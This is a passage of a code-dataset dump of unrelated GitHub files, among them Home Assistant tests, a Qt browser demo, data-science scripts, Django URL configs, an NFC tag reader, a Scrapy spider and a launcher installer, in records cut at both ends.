\"custom_components.mastertherm.coordinator.MasterthermController.get_devices\",\n side_effect=api_mock.get_devices,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_device_data\",\n side_effect=api_mock.get_device_data,\n ):\n await hass.config_entries.async_setup(entry.entry_id)\n await hass.async_block_till_done()\n\n # Check we called the Mock and we have a Sensor.\n assert (\n hass.states.async_entity_ids_count(Platform.SENSOR) > 0\n ), \"Sensors Failed to Create\"\n\n # Check the Temperature Sensor\n state = hass.states.get(\"sensor.mt_1234_1_outside_temp\")\n assert state.state == \"4.9\"\n assert state.name == \"Outside Temperature\"\n assert state.attributes.get(\"unit_of_measurement\") == UnitOfTemperature.CELSIUS\n","repo_name":"sHedC/homeassistant-mastertherm","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"19725361992","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-12 10:28:27\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:36\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport sys\nfrom qtpy.QtCore import Qt, QUrl\nfrom qtpy.QtGui import QIcon\nfrom qtpy.QtWebEngineWidgets import QWebEngineView\nfrom qtpy.QtWidgets import QApplication, QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(1000, 600)\n\n self.back_btn = QPushButton(self)\n self.forward_btn = QPushButton(self)\n self.refresh_btn = QPushButton(self)\n self.zoom_in_btn = QPushButton(self)\n self.zoom_out_btn = QPushButton(self)\n self.url_le = QLineEdit(self)\n\n self.browser = QWebEngineView()\n \n self.h_layout = QHBoxLayout()\n self.v_layout = QVBoxLayout()\n\n self.layout_init()\n self.btn_init()\n self.le_init()\n self.browser_init()\n\n def layout_init(self):\n self.h_layout.setSpacing(0)\n self.h_layout.addWidget(self.back_btn)\n self.h_layout.addWidget(self.forward_btn)\n self.h_layout.addWidget(self.refresh_btn)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.url_le)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.zoom_in_btn)\n self.h_layout.addWidget(self.zoom_out_btn)\n\n self.v_layout.addLayout(self.h_layout)\n self.v_layout.addWidget(self.browser)\n\n self.setLayout(self.v_layout)\n\n def browser_init(self):\n self.browser.load(QUrl('https://baidu.com'))\n self.browser.urlChanged.connect(lambda: self.url_le.setText(self.browser.url().toDisplayString()))\n\n def btn_init(self):\n self.back_btn.setIcon(QIcon('images/back.png'))\n self.forward_btn.setIcon(QIcon('images/forward.png'))\n self.refresh_btn.setIcon(QIcon('images/refresh.png'))\n self.zoom_in_btn.setIcon(QIcon('images/zoom_in.png'))\n self.zoom_out_btn.setIcon(QIcon('images/zoom_out.png'))\n\n self.back_btn.clicked.connect(self.browser.back)\n self.forward_btn.clicked.connect(self.browser.forward)\n self.refresh_btn.clicked.connect(self.browser.reload)\n self.zoom_in_btn.clicked.connect(self.zoom_in_func)\n self.zoom_out_btn.clicked.connect(self.zoom_out_func)\n\n def le_init(self):\n self.url_le.setFixedWidth(400)\n self.url_le.setPlaceholderText('Search or enter website name')\n\n def keyPressEvent(self, QKeyEvent):\n if QKeyEvent.key() == Qt.Key_Return or QKeyEvent.key() == Qt.Key_Enter:\n if self.url_le.hasFocus():\n if self.url_le.text().startswith('https://') or self.url_le.text().startswith('http://'):\n self.browser.load(QUrl(self.url_le.text()))\n else:\n self.browser.load(QUrl('https://'+self.url_le.text()))\n\n def zoom_in_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()+0.1)\n\n def zoom_out_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()-0.1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/webWidget.py","file_name":"webWidget.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"}
+{"seq_id":"34346025720","text":"#coding=utf-8\n\n# 查找不存在的商家编码\nimport sys\nimport openpyxl\nimport os\nimport user_input\nimport merge_sheet\nimport present\n\nif __name__ == \"__main__\":\n present.use_des()\n print(\"开始处理\\n\")\n\n wb = merge_sheet.load_spec_file(user_input.file_name_original)\n\n # 输出数据的sheet名\n output_sheet_name = \"不存在的商家编码\"\n\n all_sheet_name = wb.get_sheet_names()\n output_sheet = None\n if output_sheet_name not in all_sheet_name:\n print(\"%s不存在, 创建它\" % (output_sheet_name))\n output_sheet = wb.create_sheet(output_sheet_name)\n else:\n print(\"%s已经存在, 先删除它, 再创建它\" % (output_sheet_name))\n wb.remove_sheet(wb[output_sheet_name])\n output_sheet = wb.create_sheet(output_sheet_name)\n\n \"\"\"\n print(\"%s已经存在\" % (output_sheet_name))\n output_sheet = wb[output_sheet_name]\n \"\"\"\n\n # 计算出所有的商家编码\n all_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet2\"], \"j\", 2)\n for cell in cells:\n if cell.value not in all_business_no:\n all_business_no[cell.value] = 1\n all_business_no = all_business_no.keys()\n # print(\"\\n\\nall_business_no = %r\\n\\n\" % (all_business_no))\n\n # 计算出当前存在的商家编码\n existent_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet4\"], \"a\", 2)\n for cell in cells:\n if cell.value not in existent_business_no:\n existent_business_no[cell.value] = 1\n existent_business_no = existent_business_no.keys()\n # print(\"\\n\\nexistent_business_no = %r\\n\\n\" % (existent_business_no))\n\n # 计算出不存在的商家编码\n inexistent_business_no = {}\n for value in all_business_no:\n if value not in existent_business_no:\n if value not in inexistent_business_no:\n inexistent_business_no[value] = 1\n print(\"value = %r, 不存在\" % (value))\n inexistent_business_no = inexistent_business_no.keys()\n print(\"\\n\\ninexistent_business_no = %r\\n\\n\" % (inexistent_business_no))\n\n # 输出数据\n output_sheet.cell(\"a1\").value = \"不存在的商家编码\"\n i = 2\n for value in inexistent_business_no:\n cell_to_do = output_sheet.cell(\"a%d\" % (i))\n cell_to_do.value = value\n i += 1\n\n wb.save(user_input.file_name_original)\n present.after_process()\n\n","repo_name":"lisifenggithub/process_excel","sub_path":"find_inexistent_business_no.py","file_name":"find_inexistent_business_no.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35111516325","text":"from . import views\nfrom django.urls import path\n\n# List of all url patterns\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"homes\", views.home, name=\"home\"),\n path(\"main_menu\", views.main_menu, name=\"main_menu\"),\n path(\"contact_us\", views.contact_us, name=\"contact_us\"),\n path(\"change_price\", views.change_price, name=\"change_price\"),\n path(\"change_rate\", views.change_rate, name=\"change_rate\")\n]\n","repo_name":"karimammar135/forn_el_batoul","sub_path":"forn_el_batoul/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29247588088","text":"#!/usr/bin/env python\n\n# server program for client (tut_sock_client.py) sending requests with\n# sockets (asynchronous network programming);\n# see http://asyncoro.sourceforge.net/tutorial.html for details.\n\n# run this program and then client either on same node. If they are on\n# different computers, 'host' address must be changed appropriately.\n\nimport sys, socket\nimport asyncoro\n\ndef process(conn, coro=None):\n global n\n if sys.version_info.major >= 3:\n eol = ord('/')\n else:\n eol = '/'\n data = ''.encode()\n while True:\n data += yield conn.recv(128)\n if data[-1] == eol:\n break\n conn.close()\n n += 1\n print('recieved: %s' % data)\n\ndef server(host, port, coro=None):\n coro.set_daemon()\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = asyncoro.AsyncSocket(sock)\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((host, port))\n sock.listen(128)\n\n while True:\n conn, addr = yield sock.accept()\n asyncoro.Coro(process, conn)\n\nn = 0\nasyncoro.Coro(server, '127.0.0.1', 8010)\n\nif sys.version_info.major > 2:\n read_input = input\nelse:\n read_input = raw_input\nwhile True:\n cmd = read_input().strip().lower()\n if cmd == 'exit' or cmd == 'quit':\n break\nprint('n = %d' % n)\n","repo_name":"pgiri/asyncoro","sub_path":"examples/tut_sock_server.py","file_name":"tut_sock_server.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"36"}
+{"seq_id":"6118513573","text":"import random\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef get_xkcd_photo(index=None):\n idx = index or random.randint(0, 1900)\n r = requests.get(\"https://xkcd.com/{}/\".format(idx))\n\n return get_image(r.text)\n\n\ndef get_image(html_doc):\n obj = BeautifulSoup(html_doc, 'html.parser')\n return \"http:\"+obj.find(id=\"comic\").find('img').get('src')\n\n\nif __name__ == \"__main__\":\n print(get_xkcd_photo())\n","repo_name":"andrea-lascola/SimpleChatbot","sub_path":"app/modules/photo/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"9859660569","text":"import numpy as np\nfrom pg import discount_rewards\n\ndef memory_stack(memory, num_process, state_space, action_space):\n memory = np.array(memory)\n state, action, reward = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for i in range(num_process):\n state_stack, action_stack, reward_stack = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for j in range(memory.shape[0]):\n if type(memory[j][1][i]) != str:\n state_stack = np.vstack([state_stack, memory[j][0][i]])\n action_stack = np.vstack([action_stack, memory[j][1][i]])\n reward_stack = np.vstack([reward_stack, memory[j][2][i]])\n discounted_stack = discount_rewards(reward_stack)\n state = np.vstack([state, state_stack])\n action = np.vstack([action, action_stack])\n reward = np.vstack([reward, discounted_stack])\n return state, action, reward\n\ndef hot_action(actions, num_process, action_space):\n action_list = []\n for action in actions:\n if action == 'done':\n a = 'done'\n else:\n a = np.zeros(action_space)\n a[action] = 1\n action_list.append(a)\n return action_list\n\ndef get_action(pg, each_terminal, num_process, state):\n actions = []\n for i in range(num_process):\n if not each_terminal[i]:\n actions.append(pg.choose_action([state[i]]))\n else:\n actions.append('done')\n return actions\n\ndef check_reward(info, num_process):\n data, reward = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n reward.append(d[1])\n return reward\n\ndef check_state(info, num_process):\n data, state = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n state.append(d[0])\n return state\n\ndef check_done(info, num_process):\n data, done, all_done = [], [], False\n for i in info:\n data.append(list(i))\n for d in data:\n done.append(d[2])\n if sum(list(map(int, done))) == num_process:\n all_done = True\n return done, all_done","repo_name":"chagmgang/synch_pysc2","sub_path":"synchronized_PG/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"4061083208","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n@athor:weifeng.guo \n@data:2019/1/7 14:44\n@filename:pandas_read_and_write_excel\n\n\"\"\"\nimport pandas as pd\nimport sys\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\ndata_frame = pd.read_excel(input_file, sheetname='january_2013')\nwriter = pd.ExcelWriter(output_file)\ndata_frame.to_excel(writer, sheet_name='jan_13_output', index=False)\nwriter.save()","repo_name":"guoweifeng216/python","sub_path":"liyong_python_jingxing_shujufenxi/python_basic/chapter3/pandas_read_and_write_excel.py","file_name":"pandas_read_and_write_excel.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"43844792479","text":"# Guess Number 🔢\n# Codédex\n\nguess = 0\ntries = 0\n\nwhile guess != 6 and tries < 5:\n guess = int(input('Guess the number: '))\n tries = tries + 1\n\nif guess != 6:\n print('You ran out of tries.')\nelse:\n print('You got it!')\n","repo_name":"codedex-io/python-101","sub_path":"4-loops/18_guess_number.py","file_name":"18_guess_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"36"}
+{"seq_id":"40272870440","text":"\n# Prepare data\nwith open(\"day07.txt\", \"r\") as f:\n data = f.read().splitlines()\ndata = data[0].split(\",\")\ndata = [int(d) for d in data]\n# Sort and find the median\ndata.sort()\nmedian = data[len(data) // 2]\n# Calculate fuel for part 1\nfuel = 0\nfor n in data:\n diff = abs(n-median)\n print(\"adding \",n,\"diff\",diff)\n fuel += diff\nprint(fuel)\n\ndef triangular(n):\n return n * (n+1) / 2\n\nresults = []\nlowestfuel = 999999999999\nlowestfueli = 0\nfor objective in range(0,1899):\n fueltotal=0\n for n in data:\n fuelindividual = triangular(abs(n-objective)) # 1 +2 +3 +4 +5 ,,, 1 3 6 10 15\n fueltotal += fuelindividual\n # print(\"For element\",n,\"fuel\",fuelindividual)\n print(objective,fueltotal)\n if fueltotal < lowestfuel:\n lowestfuel = fueltotal\n lowestfueli = objective\n results.append((objective,fueltotal))\nprint(\"optimal position\",lowestfueli, \"requires lowest fuel\",lowestfuel)\n\n","repo_name":"paulbaumgarten/advent-of-code","sub_path":"2021/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"26606763909","text":"t=int(input())\n\na=300\nb=60\nc=10\n\ntime=[a,b,c]\nresult=[]\n\nfor sec in time:\n ans=0\n ans+=t//sec\n t%=sec\n result.append(ans)\n\nif t==0:\n print(*result)\nelse:\n print(-1)\n\n \n \n","repo_name":"realme1st/Algorithm-study","sub_path":"Baekjoon/그리디/전자레인지 (10162).py","file_name":"전자레인지 (10162).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1699505213","text":"import torch\nimport torch.nn as nn\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers.models.deberta_v2.modeling_deberta_v2 import *\n\n\nclass RobertaWrapper(nn.Module):\n def __init__(self, device, n_classes, truncation_list = None):\n super().__init__()\n self.truncation_list = truncation_list\n self.model = AutoModel.from_pretrained(\"roberta-base\")\n self.tokenizer = AutoTokenizer.from_pretrained(\"roberta-base\")\n self.classifier = nn.Linear(768, n_classes)\n self.device = device\n\n def forward(self, input_texts):\n input_batch = self.tokenizer(input_texts, padding=True, truncation=True, return_tensors=\"pt\")\n input_batch = {key: tensor.to(self.device) for key, tensor in input_batch.items()}\n if self.truncation_list is None:\n output = self.model(**input_batch).last_hidden_state\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n else:\n input_tokens = input_batch['input_ids']\n embeds = self.model.embeddings(input_tokens)\n total_length = embeds.shape[1]\n for i in range(len(self.truncation_list)):\n output = self.model.encoder.layer[i](embeds)[0]\n cur_length = max(1, int(self.truncation_list[i] * total_length))\n output = output[:, :cur_length, :]\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n","repo_name":"faaaaaaaaaaaaakeacc/effective_sequence_compression","sub_path":"effective_sequence_compression/models/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1991795328","text":"import binascii\n\nfrom .card import nfc_tlv_parse, CardError\n\n\nclass NtagMixin:\n def fast_read(self, start, end):\n length = (end + 1 - start) * 4\n return self.communicatethru([0x3A, start, end], response_length=length)\n\n def read_cnt(self, counter):\n response = self.communicatethru([0x39, counter], response_length=3)\n if response:\n return int.from_bytes(response, \"little\")\n return None\n\n def read_sig(self):\n return self.communicatethru([0x3C, 0x00], response_length=32)\n\n def pwd_auth(self, pwd):\n # pwd should be 4 bytes\n return self.communicatethru(b\"\\x1B\" + pwd, response_length=2)\n\n @property\n def ntag_version(self):\n return self.version\n\n @property\n def ntag_model(self):\n return self.model\n\n @property\n def ntag_signature(self):\n if \"ntag_signature\" in self.data:\n return self.data[\"ntag_signature\"]\n try:\n self.data[\"ntag_signature\"] = self.read_sig()\n return self.data[\"ntag_signature\"]\n except CardError:\n return None\n\n @property\n def ntag_data(self):\n if \"ntag_data\" in self.data:\n return self.data[\"ntag_data\"]\n if self.ntag_version is None:\n return None\n version_map = {\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x13\\x03\": 0xE6,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x13\\x03\": 0xE6,\n }\n try:\n max_block = version_map[self.ntag_version]\n except KeyError:\n return None\n read_blocks = 56\n data = b\"\"\n for block_start in range(0, max_block, read_blocks):\n block_end = min(block_start + read_blocks, max_block)\n try:\n response = self.fast_read(block_start, block_end)\n except CardError:\n return None\n if response:\n data = data + response\n else:\n return None\n self.data[\"ntag_data\"] = data\n return self.data[\"ntag_data\"]\n\n @property\n def ntag_counter(self):\n if \"ntag_counter\" in self.data:\n return self.data[\"ntag_counter\"]\n try:\n # read block zero to ensure that counter is incremented\n # self.communicatethru([0x3A, 0, 0], response_length=4)\n self.fast_read(0, 0)\n count = self.read_cnt(2)\n if count is not None:\n self.data[\"ntag_counter\"] = count\n return count\n except CardError:\n return None\n\n @property\n def ntag_ndef(self):\n if self.ntag_data is None:\n return None\n cc = self.ntag_data[12:16]\n data = self.ntag_data[16:]\n if cc[0] == 0xE1:\n version = cc[1]\n data_area_size = cc[2] * 8\n read_access = cc[3] >> 4\n write_access = cc[3] & 0x0F\n # print(\"cc\", binascii.hexlify(cc, \" \"))\n # print(\" version {}.{}\".format(version >> 4, version & 0x0F))\n # print(\" data area size {}\".format(data_area_size))\n # print(\" read access {}\".format(read_access))\n # print(\" write access {}\".format(write_access))\n # if len(data) < data_area_size:\n # print(\"fetching more data\")\n # nblocks = (data_area_size - len(data)) / 4\n # data = data + self.read_blocks(7, 6 + nblocks)\n # print(\"data\", data)\n messages = []\n terminated = False\n # print(data)\n for t, l, v in nfc_tlv_parse(data):\n # print(\"tlv\", t, l, v)\n if t == 0xFE:\n terminated = True\n break\n if t == 0x03:\n messages.append(v)\n if not terminated:\n print(\"missing data\")\n return messages\n","repo_name":"timhawes/timhawes_circuitpython_nfc","sub_path":"timhawes_nfc/ntag.py","file_name":"ntag.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18854512250","text":"import cv2 # import the OpenCV module\nimport numpy as np # import the numpy module using the name 'np'.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef buildCDF(img, outputImageName, cIndex, title):\n hist= cv2.calcHist([img], [cIndex], None, [256], [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max()/ cdf.max()\n \n fig = plt.figure()\n \n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.title(title) # subplot 211 title\n plt.savefig(outputImageName)\n\nif __name__ == \"__main__\":\n imgGrey = cv2.imread('img/messi.jpg',0) # grey scale\n buildCDF(imgGrey, \"result/01-histogram-cfd-messi-grey.png\", 0, \"grey\")\n imgColor = cv2.imread('img/messi.jpg',1) # color BGR scale\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_b.png\", 0, \"b-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_g.png\", 1, \"g-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_r.png\", 2, \"r-color\")","repo_name":"matitaweb/mumet2017_computer_vision_homework","sub_path":"HOMEWORK_01/cumulative_histogram/cumulative_histogram.py","file_name":"cumulative_histogram.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"7226045656","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom parliament_lk.items import News\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = ['parliament.lk']\n start_urls = ['http://parliament.lk/en/news-en?view=news&category=6']\n\n def parse(self, response):\n for news in response.xpath('//td[@width=\"82%\"]/a/@href').extract():\n \tyield scrapy.Request(response.urljoin(news),callback=self.parseNews)\n\n next_page_url = response.xpath('//li[@class=\"pagination-next\"]/a/@href').extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\n\n def parseNews(self, response):\n \tl = ItemLoader(item=News(), response=response)\n \tl.add_xpath('title', '//table[@class=\"newsheader\"]//td//h2[1]/text()')\n \tl.add_xpath('date', '//table[@class=\"newsheader\"]//tr[1]/td[3]/text()')\n \tl.add_xpath('content', '//div[@class=\"inner-div newsarea\"]/div[1]/p[string-length(text()) > 3]/text()')\n \tyield l.load_item()\n","repo_name":"prabod/CS4642-IR-Parliament.lk-Scraper","sub_path":"parliament_lk/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18425277017","text":"from django.urls import path\nfrom work1App import views\n\n\nurlpatterns = [\n path('', views.apiOverview, name='api-Overview'),\n #CRUD\n path('add/', views.add,name='add'),\n path('Search_filter/', views.Search_filter.as_view(),name='Search_filter'),\n path('update//', views.update,name='update'),\n path('remove//', views.remove,name='remove'),\n path('viewAll/', views.viewAll,name='viewAll'),\n \n\n]\n\n","repo_name":"Aju600610/work1-evaluation-ajith","sub_path":"work1pro/work1App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"3320883982","text":"#!/usr/bin/env python\n\nimport click\n\n@click.option('-o',\n '--opt',\n required=False, \n help='Provide additional data if required')\n@click.argument('argu',\n required=True)\n@click.command()\ndef mycli(argu, opt):\n \"\"\"Env is all set!!!!\"\"\"\n print(\"Provided argument is {} and Option is {}\".format(argu, opt))\n\nif __name__ == '__main__':\n mycli()\n","repo_name":"Lakshmisowmya/git_apis_cli","sub_path":"my-cli.py","file_name":"my-cli.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15857499761","text":"import requests\nimport os\nimport zipfile\n\n# demande où installer l'application\nprint(\"Installateur du launcher de Fastattack\")\nprint(\"Verion de l'installateur: v1.2, version du launcher à installer: v1.2\")\nvarb = True\ndossier = \"\"\nwhile varb:\n dossier = input(\"Dans quel dossier voulez vous installer le launcher [chemin valide]: \")\n if dossier.startswith('\"') and dossier.endswith('\"'):\n dossier = dossier.removeprefix('\"')\n dossier = dossier.removesuffix('\"')\n if os.path.isdir(dossier):\n varb = False\n else:\n print(\"Chemin/nom de dossier invalide\")\n\n# demande s'il faut créer un raccourci sur le bureau\nraccourci = input(\"Voulez vous créer un raccourci sur le bureau [Y/n]: \")\nif raccourci == \"Y\":\n racourci = True\nelse:\n raccourci = False\n\n# télécharge le fichier .zip qui contient l'application et les fichiers\nurl = \"https://github.com/fastattackv/Launcher-de-Fastattack/blob/main/T%C3%A9l%C3%A9chargements/Launcher%20de%20Fastattack%20v1.2.zip?raw=true\"\nfilename = dossier + r\"\\Launcher de Fastattack v1.0.zip\"\ntry:\n r = requests.get(url)\nexcept:\n print(\"ERROR: Le fichier à télécharger n'existe pas: essayez d'éxecuter la dernière version de l'application d'installation\")\n input(\"Entrée pour quitter\")\nelse:\n f = open(filename, 'wb')\n f.write(r.content)\n f.close()\n\n# dézip le fichier\n with zipfile.ZipFile(filename, 'r') as zip_ref:\n zip_ref.extractall(dossier)\n\n# supprime le .zip\n os.remove(filename)\n\n# créé le raccourci\n if raccourci:\n import win32com.client\n\n chemin = os.path.join(os.path.join(os.environ['USERPROFILE']), r'Desktop\\Launcher de Fastattack.lnk')\n target = dossier + r\"\\Launcher de Fastattack\\Launcher de Fastattack.exe\"\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n shortcut = shell.CreateShortCut(chemin)\n shortcut.Targetpath = target\n shortcut.WindowStyle = 7\n shortcut.save()\n\n print(\"Installation terminée\")\n input(\"Entrée pour quitter\")\n","repo_name":"fastattackv/Launcher-de-Fastattack","sub_path":"Fichiers source (.py)/Installer_launcher_de_Fastattack.py","file_name":"Installer_launcher_de_Fastattack.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"74330749223","text":"from enigma import getDesktop, eSize, ePoint, eMatrix4x4, eFloatAnimation, ePointAnimation, eSizeAnimation, eMatrixAnimation, eLinearInterpolator, eAcclerateInterpolator, eDecelerateInterpolator, eOvershootInterpolator, eBounceInterpolator, eWindowAnimationManager, eWindowAnimationSet\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_SKIN\nfrom Tools.Log import Log\nimport xml.etree.cElementTree as ET\n\nclass ScreenAnimations(object):\n\tdef __init__(self):\n\t\tself._desktopSize = getDesktop(0).size()\n\n\tdef loadDefault(self):\n\t\tanimset = eWindowAnimationSet.create()\n\t\tanimset.setKey(eWindowAnimationManager.KEY_DISABLED)\n\t\tanimset.setName(_(\"Disable Animations\"))\n\t\teWindowAnimationManager.setAnimationSet(animset)\n\t\tf = resolveFilename(SCOPE_SKIN, \"animations.xml\")\n\t\tif fileExists(f):\n\t\t\tself.fromXML(filesource=f)\n\n\tdef fromXML(self, filesource=None, xml=None):\n\t\tif filesource:\n\t\t\troot = ET.parse(filesource).getroot()\n\t\telse:\n\t\t\troot = ET.fromstring(xml)\n\t\tfor animation in root:\n\t\t\ttry:\n\t\t\t\tattrib = animation.attrib\n\t\t\t\tkey = attrib[\"key\"]\n\t\t\t\tname = _(attrib.get(\"title\", key))\n\t\t\t\tinternal = \"internal\" in attrib\n\t\t\t\tduration = int(attrib.get(\"duration\", 0))\n\t\t\t\talpha = pos = size = matrix = 0\n\t\t\t\talpha_hide = pos_hide = size_hide = rotate_hide = 0\n\n\t\t\t\tfor item in animation:\n\t\t\t\t\tif item.tag == \"alpha\":\n\t\t\t\t\t\talpha = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position\":\n\t\t\t\t\t\tpos = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size\":\n\t\t\t\t\t\tsize = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate\":\n\t\t\t\t\t\tmatrix = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"alpha_hide\":\n\t\t\t\t\t\talpha_hide = self._buildFloatAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"position_hide\":\n\t\t\t\t\t\tpos_hide = self._buildPointAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"size_hide\":\n\t\t\t\t\t\tsize_hide = self._buildSizeAnimation(item, duration, self._buildInterpolator(attrib))\n\t\t\t\t\telif item.tag == \"rotate_hide\":\n\t\t\t\t\t\trotate_hide = self._buildMatrixAnimation(item, duration, self._buildInterpolator(attrib))\n\n\t\t\t\tif alpha or pos or size or matrix or alpha_hide or pos_hide or size_hide or rotate_hide:\n\t\t\t\t\tanimset = eWindowAnimationSet.create()\n\t\t\t\t\tanimset.setKey(key)\n\t\t\t\t\tanimset.setName(name)\n\t\t\t\t\tanimset.setInternal(internal)\n\t\t\t\t\tif alpha:\n\t\t\t\t\t\tanimset.setAlpha(alpha)\n\t\t\t\t\tif pos:\n\t\t\t\t\t\tanimset.setPos(pos)\n\t\t\t\t\tif size:\n\t\t\t\t\t\tanimset.setSize(size)\n\t\t\t\t\tif matrix:\n\t\t\t\t\t\tanimset.setMatrix(matrix)\n\t\t\t\t\tif alpha_hide:\n\t\t\t\t\t\tanimset.setAlphaReverse(alpha_hide)\n\t\t\t\t\tif pos_hide:\n\t\t\t\t\t\tanimset.setPosReverse(pos_hide)\n\t\t\t\t\tif size_hide:\n\t\t\t\t\t\tanimset.setSizeReverse(size_hide)\n\t\t\t\t\tif rotate_hide:\n\t\t\t\t\t\tanimset.setMatrixReverse(rotate_hide)\n\t\t\t\t\teWindowAnimationManager.setAnimationSet(animset)\n\n\t\t\texcept Exception as ex:\n\t\t\t\tLog.w(\"FAILED to parse an xml defined animation! %s: %s\\n%s\" %(animation.tag, animation.attrib, ex))\n\n#eLinearInterpolator()\n#eAcclerateInterpolator(float factor)\n#eDecelerateInterpolator(float factor)\n#eOvershootInterpolator(float tension = 